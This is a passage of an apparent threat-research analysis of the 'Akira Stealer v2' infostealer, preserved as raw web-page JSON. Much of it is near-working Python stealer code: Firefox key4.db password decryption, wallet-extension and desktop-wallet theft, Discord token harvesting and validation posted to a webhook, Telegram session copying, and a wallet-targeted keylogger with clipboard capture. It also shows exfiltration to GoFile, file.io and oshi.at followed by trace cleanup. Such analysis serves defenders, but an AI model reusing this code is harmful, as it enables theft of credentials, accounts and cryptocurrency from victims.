clear_password)\n",[63,15179,15180,15185,15190,15195,15200,15205,15209,15214,15219,15224,15229,15234,15239,15244,15249,15254,15259,15263],{"__ignoreMap":65},[102,15181,15182],{"class":104,"line":105},[102,15183,15184],{},"# Load global Salt and encrypted item from key4.db\n",[102,15186,15187],{"class":104,"line":111},[102,15188,15189],{},"db = sqlite3.connect(profile_path + \"/key4.db\")\n",[102,15191,15192],{"class":104,"line":329},[102,15193,15194],{},"cursor = db.cursor()\n",[102,15196,15197],{"class":104,"line":346},[102,15198,15199],{},"cursor.execute(\"SELECT item1, item2 FROM metadata WHERE id = 'password'\")\n",[102,15201,15202],{"class":104,"line":650},[102,15203,15204],{},"global_salt, item2 = cursor.fetchone()\n",[102,15206,15207],{"class":104,"line":656},[102,15208,11519],{"emptyLinePlaceholder":2181},[102,15210,15211],{"class":104,"line":662},[102,15212,15213],{},"# Decode DER structure and derive key\n",[102,15215,15216],{"class":104,"line":668},[102,15217,15218],{},"decoded, _ = der_decode(item2)\n",[102,15220,15221],{"class":104,"line":674},[102,15222,15223],{},"entry_salt = decoded[0][1][0].asOctets()\n",[102,15225,15226],{"class":104,"line":680},[102,15227,15228],{},"cipher_text = decoded[1].asOctets()\n",[102,15230,15231],{"class":104,"line":12692},[102,15232,15233],{},"# Derive 3DES key\n",[102,15235,15236],{"class":104,"line":12698},[102,15237,15238],{},"key = derive_3des_key(global_salt, master_password, entry_salt)\n",[102,15240,15241],{"class":104,"line":12704},[102,15242,15243],{},"iv = decoded[0][1][1].asOctets()\n",[102,15245,15246],{"class":104,"line":12710},[102,15247,15248],{},"# Decrypt credentials\n",[102,15250,15251],{"class":104,"line":12716},[102,15252,15253],{},"cipher = DES3.new(key, DES3.MODE_CBC, iv)\n",[102,15255,15256],{"class":104,"line":12722},[102,15257,15258],{},"clear_password = unpad(cipher.decrypt(cipher_text))\n",[102,15260,15261],{"class":104,"line":12728},[102,15262,11519],{"emptyLinePlaceholder":2181},[102,15264,15265],{"class":104,"line":12734},[102,15266,15267],{},"print(\"Decrypted Firefox password:\", clear_password)\n",[12,15269,15270,15271,805,15273,9866,15275,15277],{},"With this routine, Akira can transparently dump ",[63,15272,14669],{},[63,15274,14672],{},[63,15276,14675],{}," for each Firefox profile, writing the decrypted output to:",[56,15279,15282],{"className":15280,"code":15281,"language":61},[59],"Passwords/Firefox_\u003CProfileName> Passwords.txt\nCookies/Firefox_\u003CProfileName> Cookies.txt\nHistory/Firefox_\u003CProfileName> History.txt\n",[63,15283,15281],{"__ignoreMap":65},[12,15285,15286],{},"This approach sidesteps user-level master password checks, giving the stealer unfettered access to all stored credentials.*",[12,15288,15289],{},[251,15290,15291],{},"4. File Structure & Naming",[56,15293,15296],{"className":15294,"code":15295,"language":61,"meta":65},[59],"\u003CComputerName>.zip\n└── \u003CComputerName>\\\n    ├── Passwords\\\n    │   ├── Chrome Passwords.txt\n    │   ├── Edge Passwords.txt\n    │   └── …\n    ├── Cookies\\\n    │   ├── Chrome Cookies.txt\n    │   ├── Edge Cookies.txt\n    │   ├── user@example.com Google Session.txt\n    │   └── …\n    ├── CreditCards\\\n    │   ├── Chrome CreditCards.txt\n    │   └── …\n    ├── History\\\n    │   ├── Chrome History.txt\n    │   └── …\n    ├── Autofill\\\n    │   ├── Chrome Autofill.txt\n    │   └── …\n    └── Wallets\\\n        ├── Firefox_Default_profiles.zip\n        ├── Firefox_Profile1_profiles.zip\n        └── …\n",[63,15297,15295],{"__ignoreMap":65},[1254,15299,15300,15314,15320],{},[1257,15301,15302,15303,15306,15307,15310,15311,7224],{},"Each ",[63,15304,15305],{},".txt"," begins with a consistent header (",[63,15308,15309],{},"\u003C================[Akira Stealer v2]>================>",") and separator line (",[63,15312,15313],{},"====…====",[1257,15315,15316,15317,1013],{},"On‑disk ZIP: ",[63,15318,15319],{},"%TEMP%\\\u003CComputerName>.zip",[1257,15321,15322,15323,1013],{},"C&C filename label: ",[63,15324,15325],{},"Akira-\u003Cusername>.zip",[12,15327,15328],{},[251,15329,15330],{},"5. Exfiltration & Cleanup",[56,15332,15334],{"className":12155,"code":15333,"language":12157,"meta":65,"style":65},"url = Webhook.uploadToGofile(zip_path)\nif not url:\n    url = Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\nWebhook.sendDataTG(zip_path, chatId, startup)\nUtils.clear_client_folder()\n",[63,15335,15336,15341,15346,15351,15356],{"__ignoreMap":65},[102,15337,15338],{"class":104,"line":105},[102,15339,15340],{},"url = Webhook.uploadToGofile(zip_path)\n",[102,15342,15343],{"class":104,"line":111},[102,15344,15345],{},"if not url:\n",[102,15347,15348],{"class":104,"line":329},[102,15349,15350],{},"    url = Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\n",[102,15352,15353],{"class":104,"line":346},[102,15354,15355],{},"Webhook.sendDataTG(zip_path, chatId, startup)\n",[102,15357,15358],{"class":104,"line":650},[102,15359,15360],{},"Utils.clear_client_folder()\n",[1254,15362,15363,15373,15387,15404],{},[1257,15364,15365,15368,15369,15372],{},[251,15366,15367],{},"Primary Channel (GoFile.io):"," The malware first attempts to upload the ZIP archive containing all stolen artifacts to GoFile.io, parsing the JSON response for a ",[63,15370,15371],{},"downloadPage"," URL that grants the attacker direct access to the archive.",[1257,15374,15375,15378,15379,15382,15383,15386],{},[251,15376,15377],{},"Automatic Fallbacks:"," Should the GoFile endpoint fail (network timeout, rate limit, etc.), the code seamlessly falls back to ",[63,15380,15381],{},"file.io",", and if that too returns an empty link, finally to ",[63,15384,15385],{},"oshi.at",". Both alternatives are invoked without raising exceptions, ensuring that one of the three services will always be tried in succession.",[1257,15388,15389,15392,15393,15396,15397,805,15400,15403],{},[251,15390,15391],{},"Webhook Reporting:"," Once a URL (or an empty string on persistent failure) is determined, ",[63,15394,15395],{},"Webhook.sendDataTG(...)"," is called, packaging together the download link, machine identifiers (",[63,15398,15399],{},"chatId",[63,15401,15402],{},"startup"," flag) and all category counts (passwords, cookies, autofills, wallets) into a single Discord or Telegram message.",[1257,15405,15406,15409,15410,15413],{},[251,15407,15408],{},"Immediate Cleanup:"," After reporting, ",[63,15411,15412],{},"Utils.clear_client_folder()"," recursively deletes the entire temporary workspace and the ZIP file itself, leaving no trace of the harvested data or the archive on disk.",[2110,15415,15416,15421],{},[12,15417,15418],{},[251,15419,15420],{},"Failure Resilience:",[1254,15422,15423,15430],{},[1257,15424,15425,15426,15429],{},"All upload routines return ",[63,15427,15428],{},"\"\""," on failure instead of throwing, guaranteeing the code flow continues.",[1257,15431,15432],{},"Even if every service is unreachable, the malware still transmits a webhook report (albeit with a missing link) before erasing local artifacts, minimizing forensic remnants unless the process crashes unexpectedly.",[52,15434],{"className":15435},[8535,8536],[12,15437,15438],{},[251,15439,15440],{},"6. Robustness & Error Handling",[1254,15442,15443,15461,15467,15476],{},[1257,15444,15445,15448,15449,15452,15453,15456,15457,15460],{},[251,15446,15447],{},"Granular Exception Handling:"," Every file system interaction—be it ",[63,15450,15451],{},"shutil.copy",", SQLite queries, or ZIP operations—is wrapped in ",[63,15454,15455],{},"try/except"," blocks. When an error occurs (locked DB, permission denied, malformed record), the exception is caught and logged via ",[63,15458,15459],{},"Akira.logErrorTg()",", and execution continues, isolating the failure to that specific file or module.",[1257,15462,15463,15466],{},[251,15464,15465],{},"Threaded Isolation per Browser:"," The extraction routines for each supported browser run in their own thread. This multi-threaded design ensures that a crash or deadlock in one browser’s extraction (e.g., corrupt profile, missing key) does not halt or delay the analysis of other browsers.",[1257,15468,15469,15472,15473,15475],{},[251,15470,15471],{},"Silent Fallbacks & Defaults:"," Many auxiliary routines, such as uploading to alternate file hosts, checking remote resources, or spawning subprocesses, employ nested ",[63,15474,15455],{}," without surface-level alerts—maximizing stealth. Default values (empty strings, booleans) are chosen to keep the flow uninterrupted and remove obvious error conditions.",[1257,15477,15478,15481,15482,15485,15486,15489],{},[251,15479,15480],{},"Mutex & Startup Guards:"," A named mutex (",[63,15483,15484],{},"1qsMlseJplTlArIF14f",") prevents multiple instances, while registry checks and ",[63,15487,15488],{},"Utils.CreateMutex()"," protect against concurrent runs, providing additional stability during real-world deployment.",[41,15491,15493],{"id":15492},"_78-wallet-and-token-exfiltration","7.8 Wallet and Token Exfiltration",[12,15495,47],{},[12,15497,15498],{},"In this phase, Akira Stealer v2 performs the most comprehensive sweep for cryptocurrency credentials and session tokens, spanning browser extensions, desktop wallets, messaging tokens, and live keylogging. It executes in parallel threads, ensuring no vector is missed. Below is a step-by-step, code-backed deep dive.",[186,15500,15502],{"id":15501},"_781-browser-extension-wallets","7.8.1 Browser Extension Wallets",[12,15504,192],{},[12,15506,15507,15510],{},[251,15508,15509],{},"Targets:"," Over 80 extensions across popular browsers, including MetaMask, Phantom, Trust Wallet, Coinbase Wallet, Solflare, Exodus, Binance Chain Wallet, Keplr, Nami, TronLink, Rabby, Talisman, and more.",[56,15512,15514],{"className":12155,"code":15513,"language":12157,"meta":65,"style":65},"# Hardcoded list of extension IDs and human-friendly names\nwalletsExtensions = [\n    [\"MetaMask\",        \"nkbihfbeogaeaoehlefnkodbefgpgknn\"],\n    [\"Phantom\",         \"bfnaelmomeimhlpmgjnjophhpkkoljpa\"],\n    [\"TrustWallet\",     \"egjidjbpglichdcondbcbdnbeeppgdph\"],\n    [\"CoinbaseWallet\",  \"hfhmhopkfngkjcalldmaepmpilmjjemb\"],\n    [\"Solflare\",        \"bhhhlbepdkbapadjdnnojkbgioiodbic\"],\n    [\"BinanceChain\",    \"fhbohimaelbohpjbbldcngcnapndodjp\"],\n    [\"Keplr\",           \"dmkamcknogkgcdfhhbddcghachkejeap\"],\n    [\"Nami\",            \"lpfcbjknijpeeillifnkikgncikgfhdo\"],\n    [\"Talisman\",        \"fijngjgcjhjmmpcmkeiomlglpeiijkld\"],\n    [\"TronLink\",        \"ibnejdfjmmkpcnlpebklmnkoeoihofec\"],\n    # ... plus dozens more mapped in code\n]\n# Extraction loop for each browser profile\nfor browser_name, (user_data, proc_name) in paths.items():\n    base = os.path.join(user_data, \"Default\", \"Local Extension Settings\")\n    for ext_name, ext_id in walletsExtensions:\n        src = os.path.join(base, ext_id)\n        if os.path.isdir(src):\n            dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", f\"{ext_name}_{browser_name}\")\n            shutil.copytree(src, dest, dirs_exist_ok=True)\n            data.ext_wallets_count += 1\n",[63,15515,15516,15521,15526,15531,15536,15541,15546,15551,15556,15561,15566,15571,15576,15581,15586,15591,15596,15601,15606,15611,15616,15621,15626],{"__ignoreMap":65},[102,15517,15518],{"class":104,"line":105},[102,15519,15520],{},"# Hardcoded list of extension IDs and human-friendly names\n",[102,15522,15523],{"class":104,"line":111},[102,15524,15525],{},"walletsExtensions = [\n",[102,15527,15528],{"class":104,"line":329},[102,15529,15530],{},"    [\"MetaMask\",        \"nkbihfbeogaeaoehlefnkodbefgpgknn\"],\n",[102,15532,15533],{"class":104,"line":346},[102,15534,15535],{},"    [\"Phantom\",         \"bfnaelmomeimhlpmgjnjophhpkkoljpa\"],\n",[102,15537,15538],{"class":104,"line":650},[102,15539,15540],{},"    [\"TrustWallet\",     \"egjidjbpglichdcondbcbdnbeeppgdph\"],\n",[102,15542,15543],{"class":104,"line":656},[102,15544,15545],{},"    [\"CoinbaseWallet\",  \"hfhmhopkfngkjcalldmaepmpilmjjemb\"],\n",[102,15547,15548],{"class":104,"line":662},[102,15549,15550],{},"    [\"Solflare\",        \"bhhhlbepdkbapadjdnnojkbgioiodbic\"],\n",[102,15552,15553],{"class":104,"line":668},[102,15554,15555],{},"    [\"BinanceChain\",    \"fhbohimaelbohpjbbldcngcnapndodjp\"],\n",[102,15557,15558],{"class":104,"line":674},[102,15559,15560],{},"    [\"Keplr\",           \"dmkamcknogkgcdfhhbddcghachkejeap\"],\n",[102,15562,15563],{"class":104,"line":680},[102,15564,15565],{},"    [\"Nami\",            \"lpfcbjknijpeeillifnkikgncikgfhdo\"],\n",[102,15567,15568],{"class":104,"line":12692},[102,15569,15570],{},"    [\"Talisman\",        \"fijngjgcjhjmmpcmkeiomlglpeiijkld\"],\n",[102,15572,15573],{"class":104,"line":12698},[102,15574,15575],{},"    [\"TronLink\",        \"ibnejdfjmmkpcnlpebklmnkoeoihofec\"],\n",[102,15577,15578],{"class":104,"line":12704},[102,15579,15580],{},"    # ... plus dozens more mapped in code\n",[102,15582,15583],{"class":104,"line":12710},[102,15584,15585],{},"]\n",[102,15587,15588],{"class":104,"line":12716},[102,15589,15590],{},"# Extraction loop for each browser profile\n",[102,15592,15593],{"class":104,"line":12722},[102,15594,15595],{},"for browser_name, (user_data, proc_name) in paths.items():\n",[102,15597,15598],{"class":104,"line":12728},[102,15599,15600],{},"    base = os.path.join(user_data, \"Default\", \"Local Extension Settings\")\n",[102,15602,15603],{"class":104,"line":12734},[102,15604,15605],{},"    for ext_name, ext_id in walletsExtensions:\n",[102,15607,15608],{"class":104,"line":12740},[102,15609,15610],{},"        src = os.path.join(base, ext_id)\n",[102,15612,15613],{"class":104,"line":12746},[102,15614,15615],{},"        if os.path.isdir(src):\n",[102,15617,15618],{"class":104,"line":12752},[102,15619,15620],{},"            dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", f\"{ext_name}_{browser_name}\")\n",[102,15622,15623],{"class":104,"line":12758},[102,15624,15625],{},"            shutil.copytree(src, dest, dirs_exist_ok=True)\n",[102,15627,15628],{"class":104,"line":12764},[102,15629,15630],{},"            data.ext_wallets_count += 1\n",[1254,15632,15633,15639],{},[1257,15634,15635,15638],{},[251,15636,15637],{},"Files copied",": Extension-specific IndexedDB, LevelDB, JSON and config files containing encrypted keys, seed phrases, login credentials.",[1257,15640,15641,1061,15644,805,15647,11558],{},[251,15642,15643],{},"Outcome folder",[63,15645,15646],{},"Wallets/MetaMask_Chrome/",[63,15648,15649],{},"Wallets/Phantom_Edge/",[186,15651,15653],{"id":15652},"_782-desktop-wallet-applications","7.8.2 Desktop Wallet Applications",[12,15655,192],{},[12,15657,15658,15660],{},[251,15659,15509],{}," Major desktop clients such as Electrum, Exodus, Atomic Wallet, Guarda, Rabby, Coinomi, Zcash, Armory, Bytecoin, Jaxx, Coinomi, etc.",[56,15662,15664],{"className":12155,"code":15663,"language":12157,"meta":65,"style":65},"walletsDesktop = [\n    [\"Electrum\",     os.path.join(os.getenv('APPDATA'), \"Electrum\", \"wallets\")],\n    [\"Exodus\",       os.path.join(os.getenv('APPDATA'), \"Exodus\", \"exodus.wallet\")],\n    [\"AtomicWallet\", os.path.join(os.getenv('LOCALAPPDATA'), \"atomic\", \"Local Storage\", \"leveldb\")],\n    [\"Guarda\",       os.path.join(os.getenv('APPDATA'), \"Guarda\", \"Local Storage\", \"leveldb\")],\n    [\"Rabby\",        os.path.join(os.getenv('APPDATA'), \"rabby-desktop\")],\n    [\"Coinomi\",      os.path.join(os.getenv('APPDATA'), \"Coinomi\", \"wallets\")],\n]\nfor name, path in walletsDesktop:\n    if os.path.isdir(path):\n        Utils.TaskKill(name.lower())\n        dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", name)\n        shutil.copytree(path, dest, dirs_exist_ok=True)\n        data.desktop_wallets_count += 1\n",[63,15665,15666,15671,15676,15681,15686,15691,15696,15701,15705,15710,15715,15720,15725,15730],{"__ignoreMap":65},[102,15667,15668],{"class":104,"line":105},[102,15669,15670],{},"walletsDesktop = [\n",[102,15672,15673],{"class":104,"line":111},[102,15674,15675],{},"    [\"Electrum\",     os.path.join(os.getenv('APPDATA'), \"Electrum\", \"wallets\")],\n",[102,15677,15678],{"class":104,"line":329},[102,15679,15680],{},"    [\"Exodus\",       os.path.join(os.getenv('APPDATA'), \"Exodus\", \"exodus.wallet\")],\n",[102,15682,15683],{"class":104,"line":346},[102,15684,15685],{},"    [\"AtomicWallet\", os.path.join(os.getenv('LOCALAPPDATA'), \"atomic\", \"Local Storage\", \"leveldb\")],\n",[102,15687,15688],{"class":104,"line":650},[102,15689,15690],{},"    [\"Guarda\",       os.path.join(os.getenv('APPDATA'), \"Guarda\", \"Local Storage\", \"leveldb\")],\n",[102,15692,15693],{"class":104,"line":656},[102,15694,15695],{},"    [\"Rabby\",        os.path.join(os.getenv('APPDATA'), \"rabby-desktop\")],\n",[102,15697,15698],{"class":104,"line":662},[102,15699,15700],{},"    [\"Coinomi\",      os.path.join(os.getenv('APPDATA'), \"Coinomi\", \"wallets\")],\n",[102,15702,15703],{"class":104,"line":668},[102,15704,15585],{},[102,15706,15707],{"class":104,"line":674},[102,15708,15709],{},"for name, path in walletsDesktop:\n",[102,15711,15712],{"class":104,"line":680},[102,15713,15714],{},"    if os.path.isdir(path):\n",[102,15716,15717],{"class":104,"line":12692},[102,15718,15719],{},"        Utils.TaskKill(name.lower())\n",[102,15721,15722],{"class":104,"line":12698},[102,15723,15724],{},"        dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", name)\n",[102,15726,15727],{"class":104,"line":12704},[102,15728,15729],{},"        shutil.copytree(path, dest, dirs_exist_ok=True)\n",[102,15731,15732],{"class":104,"line":12710},[102,15733,15734],{},"        data.desktop_wallets_count += 1\n",[1254,15736,15737,15750],{},[1257,15738,15739,15742,15743,805,15746,15749],{},[251,15740,15741],{},"Data stolen",": Keystore files (",[63,15744,15745],{},"*.dat",[63,15747,15748],{},"*.json","), private key exports, wallet configuration and transaction history.",[1257,15751,15752,15755],{},[251,15753,15754],{},"Benefit",": Offline wallet contents usable by the attacker to authorize transactions.",[186,15757,15759],{"id":15758},"_783-discord-token-harvest","7.8.3 Discord Token Harvest",[12,15761,192],{},[12,15763,15764],{},"Discord tokens are authentication artifacts—essentially long-lived bearer tokens—that can grant full access to a user’s account without requiring their credentials or MFA. Akira exploits this by scanning browser and app data folders for tokens stored by various Discord clients, including Discord Stable, Canary, PTB (Public Test Build), and even modified forks like Lightcord.",[12,15766,15767],{},"The technique targets LevelDB files under the application's Local Storage, where authentication tokens often remain in plaintext. Using regular expressions, the malware scans these .log and .ldb files for patterns that match either regular user tokens or MFA-enabled tokens.",[12,15769,15770],{},"To increase reliability and reduce noise, Akira includes a validation step: it sends a test request to Discord’s /users/@me endpoint using each harvested token. Only tokens that successfully authenticate (HTTP 200) are exfiltrated via webhook—typically to a Discord channel under attacker control.",[12,15772,15773],{},"This method allows attackers to hijack Discord accounts in real time, impersonate the victim, scrape DMs and guilds, or deploy further malware through social engineering—all without triggering login alerts.",[56,15775,15777],{"className":12155,"code":15776,"language":12157,"meta":65,"style":65},"import re, requests\npatterns = [\n    r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27,100}\",  # User tokens\n    r\"mfa\\.[\\w-]{84,100}\"                      # MFA tokens\n]\ndef harvest_discord(base, webhook_url):\n    db_dir = os.path.join(base, \"Local Storage\", \"leveldb\")\n    for file in os.listdir(db_dir):\n        if file.endswith(('.log', '.ldb')):\n            for line in open(os.path.join(db_dir, file), errors='ignore'):\n                for pat in patterns:\n                    for token in re.findall(pat, line):\n                        # Verify token\n                        h = {\"Authorization\": token}\n                        r = requests.get(\"https://discordapp.com/api/v9/users/@me\", headers=h)\n                        if r.status_code == 200:\n                            uname = r.json()[\"username\"] + \"#\" + r.json()[\"discriminator\"]\n                            payload = {\"content\": f\"**Discord** {uname}: `{token}`\"}\n                            requests.post(webhook_url, json=payload)\n",[63,15778,15779,15784,15789,15794,15799,15803,15808,15813,15818,15823,15828,15833,15838,15843,15848,15853,15858,15863,15868],{"__ignoreMap":65},[102,15780,15781],{"class":104,"line":105},[102,15782,15783],{},"import re, requests\n",[102,15785,15786],{"class":104,"line":111},[102,15787,15788],{},"patterns = [\n",[102,15790,15791],{"class":104,"line":329},[102,15792,15793],{},"    r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27,100}\",  # User tokens\n",[102,15795,15796],{"class":104,"line":346},[102,15797,15798],{},"    r\"mfa\\.[\\w-]{84,100}\"                      # MFA tokens\n",[102,15800,15801],{"class":104,"line":650},[102,15802,15585],{},[102,15804,15805],{"class":104,"line":656},[102,15806,15807],{},"def harvest_discord(base, webhook_url):\n",[102,15809,15810],{"class":104,"line":662},[102,15811,15812],{},"    db_dir = os.path.join(base, \"Local Storage\", \"leveldb\")\n",[102,15814,15815],{"class":104,"line":668},[102,15816,15817],{},"    for file in os.listdir(db_dir):\n",[102,15819,15820],{"class":104,"line":674},[102,15821,15822],{},"        if file.endswith(('.log', '.ldb')):\n",[102,15824,15825],{"class":104,"line":680},[102,15826,15827],{},"            for line in open(os.path.join(db_dir, file), errors='ignore'):\n",[102,15829,15830],{"class":104,"line":12692},[102,15831,15832],{},"                for pat in patterns:\n",[102,15834,15835],{"class":104,"line":12698},[102,15836,15837],{},"                    for token in re.findall(pat, line):\n",[102,15839,15840],{"class":104,"line":12704},[102,15841,15842],{},"                        # Verify token\n",[102,15844,15845],{"class":104,"line":12710},[102,15846,15847],{},"                        h = {\"Authorization\": token}\n",[102,15849,15850],{"class":104,"line":12716},[102,15851,15852],{},"                        r = requests.get(\"https://discordapp.com/api/v9/users/@me\", headers=h)\n",[102,15854,15855],{"class":104,"line":12722},[102,15856,15857],{},"                        if r.status_code == 200:\n",[102,15859,15860],{"class":104,"line":12728},[102,15861,15862],{},"                            uname = r.json()[\"username\"] + \"#\" + r.json()[\"discriminator\"]\n",[102,15864,15865],{"class":104,"line":12734},[102,15866,15867],{},"                            payload = {\"content\": f\"**Discord** {uname}: `{token}`\"}\n",[102,15869,15870],{"class":104,"line":12740},[102,15871,15872],{},"                            requests.post(webhook_url, json=payload)\n",[1254,15874,15875],{},[1257,15876,15877,15880],{},[251,15878,15879],{},"Validation",": Only posts valid tokens, preventing stale JWTs from being sent.",[186,15882,15884],{"id":15883},"_784-telegram-session-files","7.8.4 Telegram Session Files",[12,15886,192],{},[12,15888,15889,15891],{},[251,15890,15509],{}," Telegram Desktop/TData",[56,15893,15895],{"className":12155,"code":15894,"language":12157,"meta":65,"style":65},"def steal_telegram(tdata_path, dest_root):\n    if os.path.exists(tdata_path):\n        Utils.TaskKill(\"telegram.exe\")\n        dest = os.path.join(dest_root, \"Wallets\", \"Telegram\")\n        shutil.copytree(tdata_path, dest, dirs_exist_ok=True)\n        data.has_telegram = True\n",[63,15896,15897,15902,15907,15912,15917,15922],{"__ignoreMap":65},[102,15898,15899],{"class":104,"line":105},[102,15900,15901],{},"def steal_telegram(tdata_path, dest_root):\n",[102,15903,15904],{"class":104,"line":111},[102,15905,15906],{},"    if os.path.exists(tdata_path):\n",[102,15908,15909],{"class":104,"line":329},[102,15910,15911],{},"        Utils.TaskKill(\"telegram.exe\")\n",[102,15913,15914],{"class":104,"line":346},[102,15915,15916],{},"        dest = os.path.join(dest_root, \"Wallets\", \"Telegram\")\n",[102,15918,15919],{"class":104,"line":650},[102,15920,15921],{},"        shutil.copytree(tdata_path, dest, dirs_exist_ok=True)\n",[102,15923,15924],{"class":104,"line":656},[102,15925,15926],{},"        data.has_telegram = True\n",[1254,15928,15929,15942],{},[1257,15930,15931,1061,15934,15937,15938,15941],{},[251,15932,15933],{},"Files",[63,15935,15936],{},"tdata"," folder containing session keys, ",[63,15939,15940],{},"D877F..."," folder with secret/unsecret files.",[1257,15943,15944,15947],{},[251,15945,15946],{},"Use",": Load into attacker’s Telegram client for full account access.",[186,15949,15951],{"id":15950},"_785-live-wallet-keylogging","7.8.5 Live Wallet Keylogging",[12,15953,192],{},[12,15955,15956],{},"Cryptocurrency wallets are prime targets for modern info-stealers. Akira includes a live keylogger tailored specifically to steal wallet credentials such as seed phrases, private keys, and passwords at the moment of entry. Unlike generic keyloggers, this one activates only when a known wallet window is detected, dramatically reducing noise and increasing efficiency.",[12,15958,15959],{},"The module monitors active window titles and compares them against a hardcoded list of popular wallet apps like MetaMask, Phantom, Atomic Wallet, and others. Once a matching window is in focus, it begins recording keystrokes via system-wide keyboard hooks. When the user presses Enter, the module immediately captures the current clipboard contents—knowing that users often copy secrets during wallet setup or login—and sends both the typed input and clipboard data to the attacker's webhook. This approach is extremely effective because it combines two attack vectors:",[1254,15961,15962,15965],{},[1257,15963,15964],{},"Context-aware keylogging, to capture sensitive wallet inputs only when relevant.",[1257,15966,15967],{},"Clipboard hijacking, to extract copied recovery phrases or destination addresses before they’re pasted.",[12,15969,15970],{},"Together, these methods allow attackers to silently compromise wallets in real time, even without browser access or file exfiltration.",[56,15972,15974],{"className":12155,"code":15973,"language":12157,"meta":65,"style":65},"import keyboard, pyperclip\n\nclass WalletKeylogger:\n    def __init__(self, wallet_titles):\n        self.buf = \"\"\n        keyboard.on_release(self.capture)\n        self.wallet_titles = wallet_titles\n\n    def capture(self, event):\n        title = pygetwindow.getActiveWindow().title\n        if any(w in title for w in self.wallet_titles):\n            if event.name == 'enter':\n                data = f\"Keys:{self.buf}\\nClip:{pyperclip.paste()}\"\n                send_to_webhook(data)\n                self.buf = \"\"\n            else:\n                self.buf += event.name\n",[63,15975,15976,15981,15985,15990,15995,16000,16005,16010,16014,16019,16024,16029,16034,16039,16044,16049,16054],{"__ignoreMap":65},[102,15977,15978],{"class":104,"line":105},[102,15979,15980],{},"import keyboard, pyperclip\n",[102,15982,15983],{"class":104,"line":111},[102,15984,11519],{"emptyLinePlaceholder":2181},[102,15986,15987],{"class":104,"line":329},[102,15988,15989],{},"class WalletKeylogger:\n",[102,15991,15992],{"class":104,"line":346},[102,15993,15994],{},"    def __init__(self, wallet_titles):\n",[102,15996,15997],{"class":104,"line":650},[102,15998,15999],{},"        self.buf = \"\"\n",[102,16001,16002],{"class":104,"line":656},[102,16003,16004],{},"        keyboard.on_release(self.capture)\n",[102,16006,16007],{"class":104,"line":662},[102,16008,16009],{},"        self.wallet_titles = wallet_titles\n",[102,16011,16012],{"class":104,"line":668},[102,16013,11519],{"emptyLinePlaceholder":2181},[102,16015,16016],{"class":104,"line":674},[102,16017,16018],{},"    def capture(self, event):\n",[102,16020,16021],{"class":104,"line":680},[102,16022,16023],{},"        title = pygetwindow.getActiveWindow().title\n",[102,16025,16026],{"class":104,"line":12692},[102,16027,16028],{},"        if any(w in title for w in self.wallet_titles):\n",[102,16030,16031],{"class":104,"line":12698},[102,16032,16033],{},"            if event.name == 'enter':\n",[102,16035,16036],{"class":104,"line":12704},[102,16037,16038],{},"                data = f\"Keys:{self.buf}\\nClip:{pyperclip.paste()}\"\n",[102,16040,16041],{"class":104,"line":12710},[102,16042,16043],{},"                send_to_webhook(data)\n",[102,16045,16046],{"class":104,"line":12716},[102,16047,16048],{},"                self.buf = \"\"\n",[102,16050,16051],{"class":104,"line":12722},[102,16052,16053],{},"            else:\n",[102,16055,16056],{"class":104,"line":12728},[102,16057,16058],{},"                self.buf += event.name\n",[1254,16060,16061,16067],{},[1257,16062,16063,16066],{},[251,16064,16065],{},"Trigger list",": Window titles including “MetaMask”, “Phantom”, “Atomic Wallet”, etc.",[1257,16068,16069,16072],{},[251,16070,16071],{},"Clipboard",": Captures copied seeds or private keys.",[186,16074,16076],{"id":16075},"_786-packaging-exfiltration","7.8.6 Packaging & Exfiltration",[12,16078,192],{},[12,16080,16081],{},"After collecting browser data, credentials, wallet information, and tokens, Akira proceeds to consolidate and exfiltrate the loot in a highly automated and stealthy manner. This stage marks the final step in the infection chain, and it’s optimized for reliability and minimal forensic footprint. First, all collected data—including browser dumps, logs, and keylogged wallet information—is compressed into a ZIP archive. This ensures the full dataset can be transferred as a single payload. The archive is then uploaded to multiple public file-sharing services such as GoFile, File.io, or Oshi.at, depending on availability. These platforms provide anonymous, temporary hosting, and are often used to bypass corporate firewalls or reputation-based blocking. A structured report is simultaneously generated and sent to the attacker via a Discord or Telegram webhook. It includes summary statistics—how many wallets were found, how many tokens were valid, and a direct link to the stolen data. This gives attackers a quick overview of the target’s value without opening the archive.",[12,16083,16084],{},"Finally, the malware deletes the temporary folder and the archive from disk, effectively removing local forensic evidence. By the time a defender discovers the infection, the data is already gone—and often irretrievable.",[56,16086,16088],{"className":12155,"code":16087,"language":12157,"meta":65,"style":65},"# 1) ZIP everything (including Wallets folder)\nzip_path = shutil.make_archive(Utils.get_temp_folder(), 'zip', Utils.get_temp_folder())\n# 2) Attempt upload to primary & fallback services\nurl = Webhook.uploadToGofile(zip_path) or Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\n# 3) Report summary\nembed = {\n    \"title\": \"💰 Wallet & Token Exfiltration Report\",\n    \"fields\": [\n        {\"name\": \"Extension Wallets\", \"value\": data.ext_wallets_count},\n        {\"name\": \"Desktop Wallets\",   \"value\": data.desktop_wallets_count},\n        {\"name\": \"Discord Tokens\",    \"value\": len(valid_tokens)},\n        {\"name\": \"Telegram Sessions\", \"value\": data.has_telegram},\n        {\"name\": \"Archive Link\",      \"value\": url or \"[upload failed]\"},\n    ]\n}\nWebhook.sendDataTG(Utils.get_temp_folder(), chatId, startup)\n# 4) Cleanup local folder & ZIP\nUtils.clear_client_folder()\n",[63,16089,16090,16095,16100,16105,16110,16115,16120,16125,16130,16135,16140,16145,16150,16155,16160,16164,16169,16174],{"__ignoreMap":65},[102,16091,16092],{"class":104,"line":105},[102,16093,16094],{},"# 1) ZIP everything (including Wallets folder)\n",[102,16096,16097],{"class":104,"line":111},[102,16098,16099],{},"zip_path = shutil.make_archive(Utils.get_temp_folder(), 'zip', Utils.get_temp_folder())\n",[102,16101,16102],{"class":104,"line":329},[102,16103,16104],{},"# 2) Attempt upload to primary & fallback services\n",[102,16106,16107],{"class":104,"line":346},[102,16108,16109],{},"url = Webhook.uploadToGofile(zip_path) or Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\n",[102,16111,16112],{"class":104,"line":650},[102,16113,16114],{},"# 3) Report 